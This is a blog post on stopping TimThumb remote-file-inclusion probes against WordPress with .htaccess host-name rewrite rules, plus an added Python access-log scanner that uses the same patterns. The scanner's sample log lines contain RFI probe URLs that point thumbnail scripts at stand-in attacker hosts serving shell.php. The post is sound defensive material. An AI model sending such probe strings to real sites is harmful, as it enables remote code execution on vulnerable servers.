Stop Timthumb Attacks at Server

Stop Timthumb Attacks Before WordPress

All owners of busy, and not so busy, self-hosted WordPress sites and blogs will know all about timthumb scripting attacks on their site. If the site is running the latest, patched version of the once-vulnerable files, that is as far as the attack will go.

But the constant timthumb probing is still annoying, and every attempt uses up server resources generating a 404 Not Found response.

Stop Timthumb Attacks at Front Door

Here is a way to stop these annoying attacks at the front door, before they even reach WordPress. Adding the rules below to your website or blog .htaccess file will prevent nearly all timthumb RFI attacks from wasting server resources. The rules match by host name: the listed hosts are the ones old TimThumb versions accepted remote images from, which is why the probes use look-alike domains built on them (blogger.com.attacker.example and the like). A probe that points at some other host is not matched by this list, which is one more reason to patch the files themselves (see below).

RewriteEngine On

# TimThumb: forbid RFI by host name but allow internal requests
RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
# With [F] the substitution is ignored, so "-" (no rewrite) is the conventional target
RewriteRule .* - [F,L]
# Skip the next rewrite rule when the request targets a thumbnail script
RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
RewriteRule . - [S=1]

These rules must be added AFTER the line RewriteEngine On and BEFORE the WordPress section of the .htaccess file, which starts with # BEGIN WordPress, so that they run before WordPress's own rewrite rules.

Note: a # at the beginning of a line marks a comment, which the server does not execute. [NC] makes a condition case-insensitive and [OR] joins it to the next condition, so either matching is enough. In [F,L], F tells the server the request is Forbidden (a 403 response) and L means it is the Last rule to apply if the rule matches the incoming request; L is not strictly necessary here, as F already stops rule processing. The "-" target means "do not rewrite the URL", and [S=1] skips the next rewrite rule when the condition matches. Use a plain ASCII hyphen in the rules: a typographic dash or a stray quotation mark pasted from a web page will break the file.

If you watch your server access logs (assuming you are on Apache hosting with cPanel; other set-ups may differ) you will see 403 Forbidden responses being sent to the hacker or the bot probing for the timthumb vulnerability. If you see 500 Internal Server Error instead, the .htaccess file has a syntax error (a stray quote or a wrong dash character in a rule is a common cause), and Apache will refuse every request on the site until it is fixed.
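As an added example (not part of the original post), here is a small Python script that applies the same host-name pattern as the rewrite rules above to Apache combined-format access-log lines, so you can see which probes the rules would forbid and which they let through. It goes one step beyond the rules: a request for a thumbnail script whose src is a remote URL on a host the list does not cover is reported as "probe" rather than "allow". The host list is copied from the rule; the log lines, IP addresses and paths are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Host fragments copied from the .htaccess rule above. Old TimThumb releases
# accepted remote images from these hosts, which is why probes use them.
BLOCKED_HOSTS = [
    "blogger", "picasa", "blogspot", "tsunami", "petapolitik", "photobucket",
    "imgur", "imageshack", r"wordpress\.com", r"img\.youtube", r"tinypic\.com",
    r"upload\.wikimedia", "kkc", "start-thegame",
]

# Same pattern the RewriteCond lines use: scheme, literal or URL-encoded "://",
# optional "www" and one more character, then one of the host fragments.
RFI_RE = re.compile(
    r"(https?|ftp)(%3A|:)(%2F|/)(%2F|/)w{0,3}.?(" + "|".join(BLOCKED_HOSTS) + ")",
    re.IGNORECASE,
)

# Scripts the second rule looks for in the request path.
THUMB_RE = re.compile(r"(timthumb|phpthumb|thumbs?)\.php", re.IGNORECASE)

# Any scheme-prefixed value, encoded or not; used to flag probes the host list misses.
REMOTE_RE = re.compile(r"(https?|ftp)(%3A|:)(%2F|/){2}", re.IGNORECASE)

# Apache combined log format; the "request" field is what %{THE_REQUEST} sees.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def verdict(target):
    """Decide what the .htaccess rules would do with one request target.

    "forbid": the host-name rule matches (the rewrite answers 403).
    "probe":  a thumbnail script is called with a remote URL the host list
              does not cover, so the rule lets it through.
    "allow":  everything else, including normal internal thumbnail requests.
    """
    parts = urlsplit(target)
    if RFI_RE.search(parts.query) or RFI_RE.search(target):
        return "forbid"
    if THUMB_RE.search(parts.path) and REMOTE_RE.search(parts.query):
        return "probe"
    return "allow"


def scan(lines):
    """Parse combined-format log lines and classify each request."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        results.append((m["ip"], m["target"], verdict(m["target"])))
    return results


# Constructed sample log lines (not real traffic); IPs are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Aug/2012:10:01:02 +0200] "GET /wp-content/themes/x/timthumb.php?src=http://blogger.com.attacker.example/shell.php HTTP/1.1" 200 512',
    '203.0.113.6 - - [22/Aug/2012:10:01:03 +0200] "GET /wp-content/themes/x/thumb.php?src=http%3A%2F%2Fwww.picasa.com.attacker.example%2Fx.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Aug/2012:10:01:04 +0200] "GET /wp-content/themes/x/timthumb.php?src=wp-content/uploads/2012/08/pic.jpg&w=150 HTTP/1.1" 200 8190',
    '198.51.100.8 - - [22/Aug/2012:10:01:05 +0200] "GET /wp-content/themes/x/timthumb.php?src=http://attacker.example/x.php HTTP/1.1" 404 231',
    '198.51.100.9 - - [22/Aug/2012:10:01:06 +0200] "GET /2012/08/some-post/ HTTP/1.1" 200 14022',
]

if __name__ == "__main__":
    for ip, target, v in scan(SAMPLE_LOG):
        print(f"{v:6s} {ip:14s} {target}")
```

Run it against a copy of your own access_log (replace SAMPLE_LOG with the file's lines) to count how many requests the rules would have turned away and how many "probe" lines still reach the script; a steady stream of the latter is the case for patching the files rather than relying on the host list alone.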

Not an Excuse to Ignore other Good Practices

These rules are no substitute for good practice. The vulnerable script files, every copy of timthumb.php, phpthumb.php and thumb.php bundled with your themes and plugins, must still be updated to the latest version.

Mike Otgaar

About Mike

Web developer and techno-geek. Saltwater fishing nut. Blogger.

Posted on August 22, 2012, in WordPress. 2 Comments.

  1. Thanks for this post! It’s a great image manipulator, but it’s getting royally spanked by malware infectors!
